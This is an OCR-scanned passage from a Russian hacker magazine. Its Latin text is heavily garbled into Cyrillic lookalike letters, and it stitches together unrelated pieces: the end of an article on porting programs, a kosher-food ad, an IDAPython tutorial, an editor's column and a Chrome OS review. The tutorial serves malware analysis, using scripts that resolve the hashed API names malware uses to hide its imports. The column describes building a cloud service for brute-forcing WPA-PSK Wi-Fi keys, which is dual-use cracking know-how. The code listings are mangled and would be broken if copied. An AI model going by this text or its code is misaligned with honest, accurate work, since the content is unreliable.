ностью 70-75% она запустится. Что-то пошло не так? Вполне ожидае- 
мо. Мы тут не яичницу жарим. В общем случае придется применить 
технологию багхантинга. Брать в зубы дизассемблер, отладчик и 
ловить исключения (или ЕхііРгосезз, если программа вываливается 
безмолвно]. Сложно дать какие-то рекомендации, но все же попро- 
буем. Просмотри внимательно еще раз РЕС-файлы. Возможно, ты не 
заметил что-то, что позволяло программе жить и процветать на преж- 
ней машине. Попробуй определить несистемные библиотеки из зибсііг 
и скопировать их с заменой. Если сообщение, с которым вываливается 
программа, более информативно, чем «Ассезз ѵіоіаііоп», попробуй 
поискать в интернете текст ошибки (это может быть связано со средой 
исполнения]. Но, в любом случае, твоим главным оружием здесь будет 
незаменимая связка: дизассемблер + отладчик + мозг и прямые руки. 
Если есть возможность, то обязательно проводи все эксперименты 
только на виртуальной машине — так ты будешь уверен, что система 
не загажена и не повредишь основную операционку. Прежде чем 
мужественно рваться в бой, я тебе предлагаю попробовать свои силы 
на специально разработанной программе. Собственно, полезность 
от программы нулевая, но перенести ее просто так не получится. 
Вбеіезі.ехе работает с ВБЕ через алиас «ІезіВБЕ», за каким-то чер- 
том обращается к драйверу и просто не может функционировать без 
определенной информации в реестре и файловой системе. На диске 
ты сможешь найти все необходимое: результат работы скриптов, 
скрин ВБЕ-алиаса, драйвер, базу и саму программу. 

Заключение 

Перенос программ без инсталлятора — нетривиальная задача. 
Необходимо обладать знаниями во многих сферах ІТ — администри- 
ровании, программировании, дизассемблировании, отладке, базах 
данных. Но всегда помни: непереносимых программ не бывает! Ведь, 
как гласит манифест хакера, если компьютер совершает ошибку, то 
это ты напортачил, ц-ц 
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■ - Система кошерного питания • это древнейшая. бережно сохраняемая 



■ | традиция еврейского народа, в ее основе лежат несколько заповедей 
.ѵ из Торы в том числе, относящиеся к здоровью животных. . ; 

1 Ученые изучали и применяли Законы каі ирута на протяжении трех тысяч лет 



Люди различных национальностей и вероисповеданий доверяют 
качеству кошерных продуктов. Во многих странах мира, кошерные ■ 
продукты питания считаются более качественными - из -за строгого 
контроля и дополни юльных требований по гигиене, нишевым добавкам 

и применению химически хетест. ' 

Идеологическую основу кошерного питания прекрасно передает 
поговорка "мм - эю ю. что мы едим". От еды напрямую зависит 






Ю А + Руіііоп = любовь 



Ню может дать встроенный РуІІіоп 
в дизассемблере ГОА? 



о ША- это интерактивный дизассемблер и отладчик одновременно. 
Не так давно в нем появился еще и компилятор Нех-КиЬу, позволяющий 
преобразовывать машинный код в читаемый листинг на С. Но если и 
этого оказывается мало, пора брать ситуацию под своей контроль. 



Как ни крути, ЮА является дизассемблером №1 в мире и использу- 
ется хакерами-реверсерами, вирусными аналитиками и много кем 
еще. Встроенные отладчик и декомпилятор, возможность удаленной 
отладки, удобный подход к анализу давно сделали этот пакет стандар- 
том де-факто. Для расширения функционала ЮА долгое время было 
два пути: подключаемые плагины (большое количество готовых 
к употреблению аддонов всегда доступно на ѵѵѵѵѵѵ.орепгсе.огд/ 
боѵупІоасІз/Ьгоѵѵзе/ІРА Ріидіпз ). а также скрипты, написанные 
на собственном интерпретируемом языке ЮС. На последних 
остановимся подробнее. 



Основы ЮС 




• Для объявления переменной используется ключевое слово аіЛо. В 
отличие от С переменные должны быть объявлены до первого использо- 
вания, причем при объявлении переменную нельзя инициализировать 
значением. 

• Допускается работа с тремя типами данных: целыми числами (іпіедег), 
строками (зіхіпд) и числами с плавающей точкой. 

• ЮС не поддерживает С’шные массивы, указатели и сложные типы 
данных вроде структур и объединений. 

• Поддерживает практически все операторы языка С. 

Исключения составляют сокращенные операторы присваи- 
вания (+=, -=, *= и так далее], вместо них используется 



С помощью ЮС можно быстро разрабатывать сце- 
нарии, позволяющие автоматизировать мно- 
жество руинных действий. Язык вобрал в 
себя основные синтаксические элементы 
традиционного С, поэтому прост для 
освоения. Полная документация 
идет вместе с ЮА, но для стар- 
та вполне достаточно уяс- 
нить несколько основ- 
ных моментов: 



кА 



ІУ 




полная форма. 

• Крайне просто реализована работа со строками 
никаких тебе функций зІхсруО, зІтсаШ и прочего. 
Чтобы скопировать или склеить строки, доста- 
точно воспользоваться соответственно опе-' 
раторами присваивания и сложения 

• Как и в С, все выражения завер- 
шаются точкой с запятой, а 
блоки кода заключаются ^ 
в фигурные скобки. 

Вн^ри этих блоков ч і 
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Вызов функции для получения по хэшу (выде- 
лен) адреса функции ЬоасШЬгагуА 




можно объявлять новые переменные, но делать это нужно в 
самом начале блока. 

• Для задания пользовательской функции используется 
ключевое слово зіабс. ЮС также поддерживает пользова- 
тельские функции, выполненные в виде отдельных модулей 
(.ісіс-файлов). Входные параметры функции задаются через 
запятую, без указания типа. 

• Все параметры передаются по значению, а не по ссылке 
(указатели в ЮС не поддерживаются]. 

• В объявлении функции не присутствует никакой инфор- 
мации о том, возвращает ли она какое-то значение, и если 
возвращает, то какого типа. Для того, чтобы функция воз- 
вращала значение, используется старый добрый геЮгп. Что 
примечательно, функция может возвращать значения раз- 
личных типов. 

• Для автоматизации сложной задачи вместо небольшого 
скрипта целесообразно использовать отдельную программу. 
Минимальные требования — программа должна подключать 
директивой #іпсІисІе заголовочный файл ібс.ісіс и иметь 
функцию таіп. 

Первый сценарий 

Чтобы подкрепить краткие теоретические знания практикой, 
попробуем теперь написать простую программу, которая 
будет перечислять все присутствующие в программе функ- 
ции с указанием места, откуда они вызываются. 

#іпс1ис1е <іс!с.іс1с> 
зБаБіс таіп () { 

аиБо еа, Бипс, геБ; 

// получаем текущий адрес курсора 
еа = ЗсгеепЕА ( ) ; 

// в цикле от начала (ЗедЗБагБ) до 
// конца (ЗедЕЫВ) текущего сегмента 
Бог ( Бипс=ЗедЗБагБ (еа) ; 

Бипс != ВАБАБВЕ && Бипс < ЗедЕпсЦеа); 
Бипс=БехЕЕипсЕіоп ( Бипс) ) 

{ 

// если текущий адрес является 




} 



// адресом функции 
іі (СеЕЕипсБіопЕІадз (Бипс) != -1) 

{ 

Меззаде ( "ЕипсБіоп %з аБ Ох%х\п" , 
СеБЕипсБіопБате ( Бипс) , Бипс) ; 

// находим все ссылки на данную 
// функцию и выводим 
Бог (геБ=ЕБігзБВ ( Бипс) ; 
геБ != БАБАЕВЕ; 
геБ=ЕпехБВ ( Бипс , геБ) ) 

{ 

Меззаде ( " саііесі Бгот %з (Ох%х) \п" , 
СеЕЕипсБіопБате (геБ) , геБ) ; 

} 

} 



Алгоритм действий простой. Сначала с помощью 5сгеепЕА() 
получаем адрес, на котором в текущий момент находится 
курсор, и передаем его функциям ВедВіюгШ и 5едЕпсІ(] для 
определения границ сегмента. После чего в цикле, с начала 
и до конца сегмента, перебираем адреса всех функций с 
помощью ЫехіЕипсбопО. Она принимает на вход адрес теку- 
щей функции, возвращая адрес следующей или, если дру- 
гих вызовов не найдено, значение -1 (ВАОАОЮР]. В цикле 
с помощью ОеіЕипсбопЕІадзО проверяем, является ли дан- 
ный адрес адресом функции (если не является, возвраща- 
ется значение -1]. Посредством функции ОеіЕипсбопЫатеО 
получаем имя функции и выводим его. В завершение ото- 
бражаем также список мест, откуда она вызывается — для 
этого используется цикл с ПГгзЮО и ПпехЮО. Полученный 
код сохраняем в файл с расширением .ібс — теперь им 
можно пользоваться. Чтобы вызвать скрипт надо перейти в 
меню «Еііе -> ЗсгірБ Еііе...» (используй комбинацию клавиш 
<АІі+Е7>] и выбрать наш сценарий. В окне «ОіЕріЕ ѴѴіпбоѵѵ» 
появится результат выполнения вроде этого: 



ЕипсБіоп зБагБ аБ 0x401000 
ЕипсБіоп зиЬ_4010б0 аБ 0x401060 
саііесі Бгот зБагБ ( 0x401006 ) 
ЕипсБіоп зиЬ_401090 аБ 0x401090 
саііесі Бгот зиЬ_4010Е0 (0x401185) 
ЕипсБіоп зиЬ_4010Е0 аБ 0х4010е0 

Готово! 
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> Ііпкз 

Подробная инфор- 
мация по модулям 
ЮАРуОзоп: 
Ьех-гаѵз.сот/ісіарго/ 
ісІаруіГіоп сіосз : 
информация том, как 
работает АррсаЕ: 
ЬехЫод.сот/?р=1 1 3 . 




> іпіо 

• Поскольку набирать 
длинные скрипты на 
РуОзоп во встроенной 
в ЮА интерактивной 
консоли не очень 
удобно, рекомендую 
тебе взглянуть на 
следующий скриптик 
ІРуЕЬоп (Ыір://Ьіі. Іу/ 
г14кК ]. Он осущест- 
вляет интеграцию 
интерактивной 
РуОзоп-консоли, 
работать в которой 
намного удобнее, не- 
жели в дефолтной. 

• ША6.0 Рго ( бех- 
гаѵз.сот/ргосіисіъ. 
5біш1] — это по- 
следняя доступная 
версия, ее придется 
покупать за деньги. 
Релиз 5.0 с недав- 
него времени стал 
абсолютно бесплат- 
ным, что не может не 
радовать. 
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Иерархия модулей ЮАРуіЬоп 

ЮА + РуЙіоп = ЮАРуЖоп 

Получилось несложно, но есть еще более простой способ разрабаты- 
вать сценарии — использовать для этого плагин ЮАРуіЬоп. О главной 
фишке несложно догадаться из названия: плагин встраивает в ЮА пол- 
ноценный интерпретатор Руібоп, позволяя при этом создавать скрипты, 
обладающие полным доступом ко всем возможностям языка сценариев 
ЮС. Главное приемущество плагина — поддержка родной питоновской 
обработки данных и возможность использовать весь спектр различных 
модулей для РуіНоп. Также, аддон открывает доступ к значительной 
части функционала ЮА ЗЭК, позволяя тем самым писать сценарии для 
решения более сложных задач, которые сложно было бы реализовать на 
ЮС. На официальном сайте [ сосІе.доодІе.сот/р/ісІарѵіЬоп ] можно найти 
версию под свою операционную систему и версию ЮА. Установка про- 
ста — достаточно скопировать папки ріидіпз и руібоп из архива в папку 
ЮА. Надо позаботиться о том, чтобы в системе был установлен Руібоп. 
Совместимая версия интерпретатора указывается в имени архива 
ЮАРуіЬоп (например, сборке ібару1:Ьоп-1 ,4.3_ісІа6.0_ру2.6_ѵѵіп32.2Ір тре- 
буется РуіЬоп 2.6]. С дистрибутивом распространяется полезная папка 
ехатріез, которая поможет быстрее разобраться, что к чему. 

После установки ЮАРуіЬоп становятся доступными три модуля: 

• ібаарі, обеспечивающий связь с ЮА АРІ; 

• ібс, предоставляющий интерфейс к ЮС; 

• ібаіііііз, обеспечивающий доступ к вспомогательным утилитам. 

Все три модуля автоматически импортируются во все скрипты. 

Немного практики 

Для старта нужны базовые знания РуіЬоп'а и умение подглядывать в 
документацию по ЮАРуіЬоп. Чтобы ощутить, насколько проще осущест- 
вляется обработка данных на питоне, напишем скрипт для решения 
ранее озвученной задачи — отобразим на экране все вызываемые 
функции. Воспользуемся низкоуровневыми вызовами из модуля ібаарі. 

Бгот ісіаарі ітрогБ * 

# получаем текущий адрес курсора 
еа = деБ_зсгееп_еа ( ) 

# получаем сегмент по адресу 
зед = деБзед(еа) 

# ищем в цикле от начала сегмента до конца 
Бшіс = деБ_Бипс (зед. зБагБЕА) 

тліЬіІе ілтс із поБ Ыопе апсі Бипс . зБагБЕА < зед.епсІЕА: 
Бипсеа = Бипс . зБагБЕА 
ргіпБ "ЕипсБіоп %з аБ Ох%х" % 

(СеБЕипсБіопБате (ілтсеа) , ілтсеа) 
геБ = деБ_БігзБ_сгеБ_Бо ( ілтсеа) 
ѵтііііе геі: != ВАБАББК: 

ргіпБ " саііесі Бгот %з(0х%х)" % 

( деБ_Бипс_пате (геі:) , геБ) 
геБ = деБ_пехБ_сгеБ_Бо ( Бипсеа, геі:) 
ілтс = деБ_пехБ_Бипс (Бипсеа) 



Мр ОиІриЕ ѵяпсісил» 



Рипссіоп ійаіп аъ 0x401000 
РипсЬюл деЬКегпе1Э2А(ійг аѣ Ох40Ю6С 
саііесі ігою. 0х40100б ) 

РипеЪіогі са1с_ЬазЬ аЪ 0х401090] 

саііесі йгот деѣРгосАсЫг (0x401195) 
РтісЬіоп деЪРгосАіісіг аѣ 0x4010*0 
саііесі Іаот таіп < 0x40101?) 
саііесі Ёг отъ итіп( 0x401036) 



РуіНоп | 



АІГ: ісііе Боѵп 



ВІ5к: 306 



Результат работы скрипта для получения всех функций 
и мест их вызова (результат в Оігіриі ѴѴіпбоѵѵ внизу 
экрана) 



как говорится, совершенству нет предела: можно написать аналогичный 
сценарий, который будет еще короче. В этом поможет модуль ісіаиіііз: 



Бгот БсІаиБіІз ітрогБ * 
еа = ЗсгеепЕА ( ) 

Бог Бипсеа іп ЕипсБіопз (ЗедЗБагБ (еа) , ЗедЕпсІ (еа) ) : 
ргіпБ "ЕипсБіоп %з аБ Ох%х" % 

(СеБЕипсБіопЫате ( Бипсеа) , Бипсеа) 



Бог геБ іп СосіеКеБзТо ( Бипсеа, 1): 
ргіпБ " саііесі Бгош %з(0х%х) м % 

(СеБЕипсБіопБаше (геБ) , геБ) 

Вот где по-настоящему ощущается вся прелесть РуіЬоп: сценарий 
вообще не нуждается в комментариях. Код с грамотно обозначенными 
названиями функций сам предельно ясно говорит, что он делает. 

Реальная задача 

И все-таки. Посмотреть список функций, вообще говоря, можно и стан- 
дартными средствами ЮА. Так что мы всего лишь изобрели велосипед 
(хотя и познакомились с основными понятиями ЮС и ЮАРуіЬоп]. Но 
попробуем все-таки решить реально полезную задачу. 

Как известно, ЮА является основным инструментом вирусных анали- 
тиков, используемым для статического анализа отловленной малвари. 
Малварь же, в свою очередь, стремится как можно сильнее усложнить 
процедуру исследования. Очень часто при исследовании вредоносных 
программ обнаруживается, что приложение не импортирует ника- 
ких функций. Или, например, заменяет имена АРІ-вызовов хэшами, 
определяя адрес нужной функции путем поиска в таблице экспорта, 
вычисляя хэш для каждого имени и сравнивая с желаемым. Рассмотрим 
этот прием подробнее. Программа из РЕВ (Ргосезз Епѵігоптепі Віоск] 
получает адрес библиотеки кегпе132.сИ1 и в ее таблице экспорта ищет 
по хэшу адреса ЕоасЮіЬгагу и ОеіРгосАсІсІгезз. С помощью этих двух 
вызовов можно подгружать остальные библиотеки и искать в них адре- 
са нужных функций. Вообще функция ОеіРгосАсІсІгезз даже не нужна, 
так как, зная адрес библиотеки, можно самостоятельно получить адрес 
нужной функции из таблицы экспорта. Это популярный механизм, кото- 
рый нередко используется в малвари. Итак, вырисовывается вполне 
понятная задача — написать скрипт, который автоматизировал бы поиск 
названий функций и упростил таким образом жизнь реверсера. 

Чтобы разговор был предметным, напишем небольшое подопытное 
приложение, которое будет использовать вышеперечисленные техники 
маскировки. Весь функционал приложения будет сводиться к выводу 
сообщения «Неііо, ѵѵогісі!» при помощи функции МеззадеВох. Для этого 



Как видишь, скрипт получился очень похожим на ЮС-реализацию. Но, 

► 024 
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Результат работы скрипта. Импорт полученных 
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нам потребуется всего три типа вызовов: ѲеЖегпеІАсІсІгеззО для получе- 
ния адреса кегпе132.сШ, СаІсНазЫ) для вычисления хэша по имени функ- 
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Импорт вычисленных хэшей 



ции, а также ОеіРгосАббгеззЕхО для получения адреса функции по хэшу. 


00401022 


ризк 


оіізеб а!Ізег32_б11 ; "изег32.б11 


Полный исходный код тестового приложения ты найдешь на диске: 


00401027 


саіі 


[ еЬр+ѵаг_4 ] 




0040102А 


шоѵ 


[еЬр+ѵаг_10] , еах 




0040102Б 


ризЪ. 


0АВВС680БН < хэш МеззадеВохА 


іпС шаіп ( ) 


00401032 


шоѵ 


есх, [еЬр+ѵаг_10] 


{ 


00401035 


ризк 


есх 


НМОБІШЕ кегпе132 , изег32; 


00401036 


саіі 


зиЬ_4010Е0 


//получаем адрес кегпе132 . сііі 


0040103В 


абб 


езр , 8 


кегпе132 = (НМОБІШЕ) СебКегпеІАббгезз ( ) ; 


0040103Е 


шоѵ 


[еЬр+ѵаг_С] , еах 


//получаем адрес функции ЬоасЗЬіЬгагуА 


00401041 


ризЬ 


0 


ЦЕоабЬіЪгагуА рЬоабЫЪгагуА = (СЬоасЗЫЬгагуА) 


00401043 


ризЪ. 


0 


СебРгосАббгеззЕх ( кегпе132, 0хС8АС8026 ); 


00401045 


ризк 


оіізеб аНеІІоМогІб 


//загружаем библиотеку изег32.б11 


; 


"Неііо ілгогіб! 


" 


изег32 = рЬоабЬіЬгагуА ( "изег32 . 611 " ) ; 


0040104А 


ризЪ. 


0 


//получаем адрес МеззадеВохА из изег32.б11 и вызываем 


0040104С 


саіі 


[еЬр+ѵаг_С] 


ШеззадеВохА рМеззадеВохА = (ШеззадеВохА) 


0040104Е 


хог 


еах , еах 


СеСРгосАббгеззЕх ( изег32, 0хАВВС680Б ); 


00401051 


шоѵ 


езр , еЬр 


рМеззадеВохА ( 0 , "Неііо, ѵтогіб! " , 0, 0) ; 


00401053 


рор 


еЬр 


гебигп 0 ; 


00401054 


гебп 





} 



После компиляции код будет выглядеть примерно так: 



00401000 


ризЪ 


еЬр 


00401001 


шоѵ 


еЪр, езр 


00401003 


зиЬ 


езр, ЮЪ 


00401006 


саіі 


зиЬ_401060 < СебКегпеІ ( ) 


0040100В 


шоѵ 


[еЬр+ѵаг_8] , еах 


0040100Е 


ризЪ 


0С8АС8026Н < хэш ІюабЕіЪгагуА 


00401013 


шоѵ 


еах, [еЬр+ѵаг_8] 


00401016 


ризЪ 


еах 


00401017 


саіі 


зиЬ_4010Е0 


0040101С 


абб 


езр, 8 


004010ІЕ 


шоѵ 


[еЬр+ѵаг_4] , еах 



Как видишь, никаких вызовов АРІ-функций в чистом виде. Обращение 
к МеззадеВох превратилось в саіі [еЬр+ѵаг_С] (по адресу 00401 04С]. 
Причем в случае настоящей малвари были бы зашифрованы еще и 
строки. На практике такой простой прием может значительно увеличить 
время анализа приложения. Как быть? Предположим, мы восстановили 
алгоритм работы программы и поняли, что значения, которые кладутся 
в стек по адресам 00401 00Е и 00401020 — это хэши функций. Но как 
узнать, что за функции скрываются за ними? В нашем текстовом образце 
— всего несколько вызовов, поэтому нет большой проблемы просто запу- 
стить отладчик и посмотреть, куда приведет нас саіі. Но что делать, когда 
таких вызовов сотни? Вот тут-то и понадобятся возможности ЮАРуЖоп. 

Наше решение 

После беглого анализа кода становится видно, что функция зиЬ_401 060 
возвращает адрес кегпе132.бИ. А зиЬ_4010Е0, вызываемая в программе 
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Теперь хэш можно заменить на символическую 
константу ІіазИкетеІЗ 2 1.оас)иЬгагуА из Епит$ 



два раза, возвращает адрес функции из заданной библиотеки по хэшу. 
Заглянем внутрь. В теле функции присутствует всего один саіі (по адре- 
су 00401 185], после которого возвращаемое значение сравнивается с 
переданным хэшем. Очевидно, что это функция вычисления хэша по 
имени. Переименуем ее в саІс_ЬазЬ. Взглянув на код, становится ясно, 
что фрагмент является самодостаточным (то есть не вызывает внутри 
себя других функций) и легко извлекается из общего листинга. Это зна- 
чит, что его можно «выдернуть» и встроить в нашу программу для под- 
счета хэшей. Но мы поступим по-другому. 

Вместо этого мы задействуем ЮАРуібоп и напишем скрипт, который с 
помощью сакщЬазЬ будет вычислять хэши всех экспортируемых имен в 
рамках текущей отладочной сессии. План таков: 

• извлечь тело функции саІсДіазб и сделать его доступным для исполь- 
зования в скрипте; 

• найти все экспортируемые имена; 

• с помощью функции саІс_Ьа5І~і посчитать хэш для каждого имени и 
запомнить результаты; 

• вывести результаты в отдельном окне. 

Итак, этап первый. Подготавливаем функцию саІсДзазб для использо- 
вания в скрипте. Так как она является самодостаточной, то мы можем 
извлечь ее тело из базы данных ЮА и вызывать ее при помощи сіурез: 



# Извлекаем тело функции из базы ІБА 

бобу = ібаарі . деб_бшіс ( ібс . ЬосВуИаше ( ' са1с_ПазЪ. 1 ) ) 

# Выделяем буфер при помощи ѴігбиаІАІІос , передавая 
туда значения МЕМ_СОММІТ, РАОЕ_ЕХЕСбТЕ_КЕАШКІТЕ (ука- 
зываем, что память исполняемая) 

са1с_1таз]т_рбг = ѵліпбіі . кегпе132 .ѴігбиаІАІІос ( 0 , 
Іеп(Ъобу), 0x1000, 0x40) 




Но так как функция саІсДіазб будет вызвана по крайней мере 9 тысяч 
раз (для библиотеки кегпе132.бЩ, то мы будем использовать первый 
рассмотренный способ как более быстрый. 

Следующий этап — поиск экспортируемых имен. Тут я должен сделать 
небольшое замечание: отладочная сессия для этого должна быть 
активна. Другими словами, наша программа должна быть запущена под 
отладчиком. Мы предварительно ставим брейкпоинт, запускаем про- 
грамму в ЮА и, когда она остановится на бряке, запускаем на выпол- 
нение наш скрипт. Каждый раз при запуске отладочной сессии дебагер 
ЮА Рго просит отладочный модуль предоставить список отладочных 
имен. По сути, отладочными именами являются экспортируемые имена 
всех загруженных модулей. Чтобы получить этот список программным 
путем, воспользуемся вызовом ібаарі. де{_сІеЬид_паппе5(]. Реализуем 
функцию 1ю1:сЬ_с1еЬид_паппе5, которая будет возвращать список имен в 
формате (адрес, имя функции, имя модуля): 

бе б бебсП_беЪид_патез ( ) : 
геб = [] 

бп = ібаарі . деб_беЪид_патез ( ібаарі . сѵаг . іпб .тіпЕА, 
ібаарі . сѵаг . іпб . тахЕА) 
бог аббг іп бп: 
п = бп[аббг] 
і = п. біпб ( '_' ) 

геб . аррепб ( ( аббг , п[і+ 1 :], п[:і])) 
гебигп геб 

Каждое возвращенное отладочное имя имеет следующий формат: 
Моби[епате_АріЫаппе. Вот почему мы разделяем эту строку по символу 
«_». Теперь у нас есть функция для вычисления хэшей и список всех 
имен. Можно начинать генерировать хэши. Это уже третий этап: 

бп = бебсП_беЪид_патез ( ) 
сасНе = { } 

бог абб, пате, тобпате іп бп: 

ПазЬ. = са 1 с_ПазЪ. (пате) 
іб тобпате поб іп сасНе: 
сасПе [тобпате] = [] 

сасПе [тобпате] .аррепб( (пате, ПазП, аббг)) 

После этого остается только вывести результат в красивом окне. В 
ЮАРуШоп есть возможность добавлять свои окна со списком, состоя- 
щим из чего-либо (как дефолтное окно со списком имен функций]. Для 
этого нужно создать класс-наследник от типа СЬоо5ег2. Делается это 
довольно просто, поэтому подробно останавливаться на этом не буду. 

На диске есть пример и полная версия нашего скрипта, которую теперь 
ты можешь использовать. Хочу заметить, что в сценарии также реали- 
зован импорт вычисленных хэшей в Епитз (список). Это выглядит так. 
Допустим, что мы встретили в коде очередной вызов функции по хэшу: 

ризЬ. ЗЕСІВБ 8 БІ 1 

саіі зиЪ_4010Е0 




# Копируем тело функции в выделенный буфер 
теттоѵе (са1с_]газЪ._рбг , Ьобу, Іеп(Ьобу)) 

# Задаем прототип функции при помощи СЕШСТУРЕ. Первый 
параметр — тип возвращаемого значения, второй — тип 
передаваемого аргумента 

ргобо = СЕШСТУРЕ (с_иіпбЗ 2 , с_сПаг_р) 

# Создаем экземпляр функции 
саіс_ПазЬ. = ргобо (са1с_ПазП_ркг) 

В принципе, реально использовать механизм Аррсаіі для дости- 
жения той же самой цели. Выполнив в командной строке питона 
Руббюп>Ь.ех (Аррсаіі . са1с_Ь.азЬ. ( "ЬоабЬіЬгагуА" ) &0хббббббб 
б) мы могли бы получить значение вычисленного хэша 0х0С8АС8026І_. 



Теперь мы можем нажать <т> и выбрать соответствующую ему функцию, 
после чего вызов сразу примет удобочитаемый вид: 

ризН ПазП_кегпе132_СебМоби1еНапб1еА 

саіі зиЬ_4010Е0 

Удобно? Еще бы! 

Вот так, единожды решив задачу, можно использовать наработки во 
время реверсинга вновь и вновь. Конечно, одного прочтения статьи 
недостаточно, чтобы сходу начать разрабатывать сценарии для ЮА. Но 
наша задача была в том, чтобы показать, как можно быстро и изящно 
заточить дизассемблер под себя и прокачать его функциональность. 
Этим постоянно пользуются многие реверсеры и ресечеры, в том числе 
наши постоянные авторы, □с 
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КОЛОНКА РЕДАКТОРА 

Как организовать брутфорс-сервис? 



Мне всегда нравилось, как люди совер- 
шенно легально зарабатывают деньги 
на околохакерских сервисах. Полностью 
автоматизированные механизмы избав- 
ляют от рутинных действий — надо лишь 
поддерживать работу софта и серверов. 
Деятельность ведется в рамках закона, 
что исключает возможное давление со 
стороны органов. Аспект работы в обла- 
сти ИБ греет душу :). Примеров таких 
разработок можно привести множество. 
Веб-фронтенд для криптора, который 
упаковывает исполняемые файлы, тем 
самым усложняя анализ и обнаружение 
малвари антивирусами. Или сервис для 
взлома САРТСНА, предлагающий разра- 
ботчикам ботов специальный АРІ, через 
который можно загрузить на сервер кар- 
тинки, которые практически мгновенно 
будут распознавать кропотливые китайцы 
за ошеломляюще низкую таксу вроде 
«1000 САРТСНА = $1 ». Последний тренд 
— это облачные сервисы для выполнения 
ресурсоемких задач. Хорошим примером 
тут является ѴѴРА Сгаскег ( фасгаскег. 
сот ), который за небольшую плату ($17) 
позволяет выполнить брутфорс-атаку на 
защищенную ѴѴРА-Р5К беспроводную 
сеть. Напомню, перебор — это единствен- 
ный способ подобрать ключ для закрытой 
сети ѴѴі-Рі (да и то исключительно при 
наличии дампа трафика с перехваченной 
последовательностью авторизации, так 
называемого ѴѴРА Напсізбаке). А занять 
он может дни, месяцы, годы. Для увели- 
чения эффективности перебора сначала 
использовались специализированные 
словари, потом были сгенерированы 
радужные таблицы, позже появились ути- 
литы, задействовавшие технологии ІМѴЮІА 
СІЮА и АТІ Зігеапп для аппаратного уско- 
рения процесса за счет 6РІІ, и вот теперь 
в нашем распоряжении — облачные 
сервисы. Тот же ѴѴРА Сгаскег предлагает 
доступ к кластеру из 400 СРІІ, осущест- 
вляющему перебор по словарю со 135 
миллионами слов. На обычном двухъядер- 
ном компе такой перебор занял бы 5 дней, 
а на мощностях кластера — 20 минут. 
Может показаться, что реализовать что- 
то подобное — чрезвычайно сложная 
задача. На самом же деле все в точности 
наоборот. С развитием облачных плат- 
форм создать такой сервер и даже начать 



на этом зарабатывать стало реально как 
никогда. В статьях прошлого номера мы 
рассказывали о РР-акции отАтаюп 
ѴѴеЬ Зегѵісез ( аѵуз.атагоп.сот ). в рамках 
которой каждый может бесплатно попро- 
бовать облачные технологии компании, а 
также на примере разобрались, как легко 
и быстро использовать технологию, запу- 
стив сервер и подняв на нем ѴРЫ-демон 
(см. РБР-версию статьи на диске). Чем 
это лучше обычного хостинга или дедика? 
Очень просто: АѴѴ5 за считанные секунды 
позволяет запустить сколько угодно таких 
серверов (или, если говорить в терминах 
технологии, инстансов) и платить только 
за фактическое время их использования. 
При таком раскладе идея создать кластер 
для решения ресурсоемких задач, который 
включался бы по требованию, напраши- 
вается сама собой. Тем более, что Атагоп 
предоставляет мощный и понятный АРІ, 
позволяя автоматизировать управление 
серверами с помощью элементарных 
скриптов. Начинает вырисовываться 
понятная схема: один инстанс, самой 
простой конфигурации, должен работать 
постоянно и принимать от пользователя 
запросы на выполнение перебора. А непо- 
средственно кластер автоматически вклю- 
чается по требованию, причем строго на 
то время, которое потребуется для реше- 
ния задачи. Но это еще не все. 

С недавнего времени компания пополнила 
ряд возможных конфигураций инстансов, 
добавив в него так называемые Сіизіег 
ѲРІІ Іпзіапсез. Эта конфигурация оснаще- 
на сразу двумя ОРІІ-картами ІМѴЮІА Тезіа 
Регппі М 2050, каждая из которых содержит 
448 ядер и 3 Гб памяти. Надо ли говорить, 
что это настоящее сокровище для тех 
пока немногочисленных утилит, которые 
умело используют технологии акселера- 
ции за счет ОРІІ? Впрочем, даже если не 
брать в расчет этот приятный факт, кон- 
фиг инстанса как нельзя более подходит 
для решения ресурсоемких задач: 22 Гб 
оперативной памяти, 2 четырехъядерных 
процессора, 1690 Гб памяти локально- 
го диска, 64-битная система. В том, как 
начать работу с сервером и запустить свои 
инстансы, можно разобраться за десять 
минут. По сути, нужно только выбрать 
готовый образ с операционной системой. 
Проверенный вариант — Сіизіег Іпзіапсез 



НѴМ СепЮЭ 5.5, для которого поддержка 
СІЮА является встроенной по умолчанию, 
поэтому потребуется минимум дополни- 
тельных настроек. В момент создания сер- 
вера выбираем АМІ-образ с идентифика- 
тором аті-аа30с7с3 и тип инстанса Сіизіег 
6РІІ (сд 1 ,4хІагде, 226В). Вот так: всего 
несколько кликов мыши — и мы имеем в 
распоряжении мощный сервер, к которому 
легко подключиться по 55Н и установить 
приложения, которые используют техно- 
логию СІЮА. Для примера можно попро- 
бовать хэш-крякер СІЮА-МиІТіЬгсег (на 
официальном сайте сгуріобаге.сот поми- 
мо дистрибутива ты найдешь еще и радуж- 
ные таблицы) или, если возвращаться к 
нашему примеру, прогу для брута ѴѴРА/ 
ѴѴРА2-Р8К — Ругіі ( сосіе.доодіе.сопп/р/ 
рѵгіі: ). Для запуска, правда, придется чуть 
поработать напильником. Но все необхо- 
димые правки конфига подробно описаны 
в Мануэле ЬІГІѵ/ес2-дрц . 

Запустить такой сервер для нас — дело 
пары секунд. Но самое главное, что еще 
через пару секунд мы можем получить вто- 
рой такой же инстанс. Вот уже и кластер. 
Добавляем третий, четвертый и так далее. 
По умолчанию каждый аккаунт в Атагоп 
может использовать до восьми инстансов 
Сіизіег ѲРІІ, но этого вполне должно хва- 
тить. Тем более, что за использование каж- 
дого сервера придется платить. И немало 
— $2.1 0 за час. □с 



ѴѴРА Сгаскег — один из первых 
облачных сервисов для хакера 
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Сг-48 — первый ноутбук 
боодіе СЬготе 05 



600611 
СНР0МЕ03 ' 

УЖЕ СЕЙЧАС 

Устраиваем тест-драйв новой ОС от боодіе 

о Операционная система боодіе СНготе 05 близка к нам как никогда. 

В декабре компания отправила 60 000 ноутбуков Сг-48 на базе новой ОС 
тем, кто оставил заявки и подошел по ряду требований. Пользователи 
из России как обычно оказались в пролете. И пускай нетбука от боодіе 
мы не увидим, оценить саму ОС можем вполне! 



Правильный ноутбук глазами Ооодіе — это уже интересно. Загрузка 
занимает около десяти секунд, а выход из спящего режима про- 
исходит мгновенно. Это не те обещанные когда-то семь секунд, но 
уже неплохо. Нетбук, к тому же с системой, полностью завязанной 
на онлайн, не мог остаться без беспроводных модулей. Поэтому 
помимо адаптера 802. 1 1 Ь/д/ п здесь есть еще и встроенный модем 
30. Для видео-звонков предусмотрена неплохая веб-камера. 
Клавиатура ноутбука — полноразмерная, а площадь тачпада замет- 
но увеличена. При весе в 1.7 кг (казалось бы, не позволяющем 
рассчитывать на мощный аккумулятор] ноутбук работает около 8 



